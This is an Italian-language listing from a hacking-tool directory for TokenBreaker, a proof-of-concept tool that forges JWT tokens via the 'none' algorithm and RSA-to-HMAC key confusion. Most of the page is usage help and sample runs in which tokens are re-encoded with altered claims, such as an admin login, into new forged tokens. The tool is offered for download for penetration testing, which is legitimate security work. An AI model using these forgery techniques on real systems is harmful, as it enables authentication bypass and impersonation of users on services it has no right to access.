Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
TokenBreaker — POC della vulnerabilità di conversione da JSON RSA a HMAC e algoritmo None | Kitploit
Strumenti/GitHubGitHub/cyberblackhole/tokenbreaker
Analisi delle VulnerabilitàExploitSicurezza WebPenetration Testing
GitHubcyberblackhole/tokenbreaker

TokenBreaker

POC della vulnerabilità di conversione da JSON RSA a HMAC e algoritmo None

Vedi Repository
63216 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

TokenBreaker

Token Breaker è incentrato su 2 particolari vulnerabilità relative ai token JWT.

  • None Algorithm
  • RSAtoHMAC

Fare riferimento a questo link per approfondimenti sulla vulnerabilità e su come un attaccante può falsificare i token

Prova questa vulnerabilità qui

Utilizzo di TheNone

root@kitploit:~
usage: TheNone.py [-h] -t TOKEN

TokenBreaker: 1.TheNoneAlgorithm

optional arguments:
  -h, --help            mostra questo messaggio di aiuto ed esci

required arguments:
  -t TOKEN, --token TOKEN
                        Valore del token JWT

Example Usage: python TheNone.py -t [JWTtoken]

Output

root@kitploit:~
$ ./TheNone.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6ImFkbSIsImlhdCI6IjE1Mzc1MjMxMjIifQ.ZWZhNjRmZDgzYWYzNDcxMjk5OTQ4YzE0NDVjMTNhZmJmYTQ5ZDhmYjY0ZDgyMzlhMjMwMGJlMTRhODA2NGU4MQ

TheNone

[*] Valore dell'header decodificato: {"alg":"HS256","typ":"JWS"}
[*] Valore del payload decodificato: {"login":"adm","iat":"1537523122"}
[*] Nuovo valore dell'header con algoritmo none: {"alg":"None","typ":"JWS"}
[<] Modificare l'header? [y/N]: n
[<] Inserisci il tuo payload: {"login":"sprAdm","iat":"0"}
[+] Token codificato con successo: eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6InNwckFkbSIsImlhdCI6IjAifQ.

Utilizzo di RSAtoHMAC

root@kitploit:~
usage: RsaToHmac.py [-h] -t TOKEN -p PUBKEY

TokenBreaker: 1.RSAtoHMAC

optional arguments:
  -h, --help                        mostra questo messaggio di aiuto ed esci

required arguments:
  -t TOKEN, --token TOKEN           Valore del token JWT
  -p PUBKEY, --pubkey PUBKEY        Percorso del file della chiave pubblica

Example Usage: python RsatoHMAC.py -t [JWTtoken] -p [PathtoPublickeyfile]

Output

root@kitploit:~
$ ./RsaToHmac.py -t eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU0MDM3NjA2MSwiZXhwIjoxNTQwMzc2MTgxLCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.HI50KvoHzcf7znWkrdugn5-O-68PpJAeiS21cLisC1WgEI21gWnqqvv3oqsnzbGkIt21NvPVHWFXoKJmLPKHeMeYLgc7nuVdF37WWd7M1XzZEP8zLoed7Z6K0KfNuR_CRsjogv1KAt8fJQvRzRhFi9dORHGxWRqpiInIgLKROLgXB-7Rv2SOYdyD_XylRaVJ1JpmmCyVmIbzVWhVuRJWT59AUm43yYRP3bBt-bnhMfkzFpwxTk3O84-On4DoIt6NIkRJaxXDUdDKscLGmSWQmdZsZds3XSV0ZgN0PObADqkZwwCBAqUTT7l5BVcBmasdnNuZ8cCDKzNtJr2cdow6zQ -p public.pem

RSA to HMAC

[*] Valore dell'header decodificato: {"typ":"JWT","alg":"RS256"}
[*] Valore del payload decodificato: {"iss":"http:\/\/demo.sjoerdlangkemper.nl\/","iat":1540376061,"exp":1540376181,"data":{"hello":"world"}}
[*] Nuovo valore dell'header con HMAC: {"typ":"JWT","alg":"HS256"}
[<] Modificare l'header? [y/N]: n
[<] Inserisci il valore del tuo payload: {"iss":"http:\/\/www.google.com\/","iat":2351287873,"exp":1843945693,"data":{"hello":"hacked!"}}
[+] Token codificato con successo: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC93d3cuZ29vZ2xlLmNvbVwvIiwiaWF0IjoyMzUxMjg3ODczLCJleHAiOjE4NDM5NDU2OTMsImRhdGEiOnsiaGVsbG8iOiJoYWNrZWQhIn19.8jfUVCZPA7cWaSfe0LIjRt692RaFHnnvtw0jHoSAneQ
Scarica lo strumento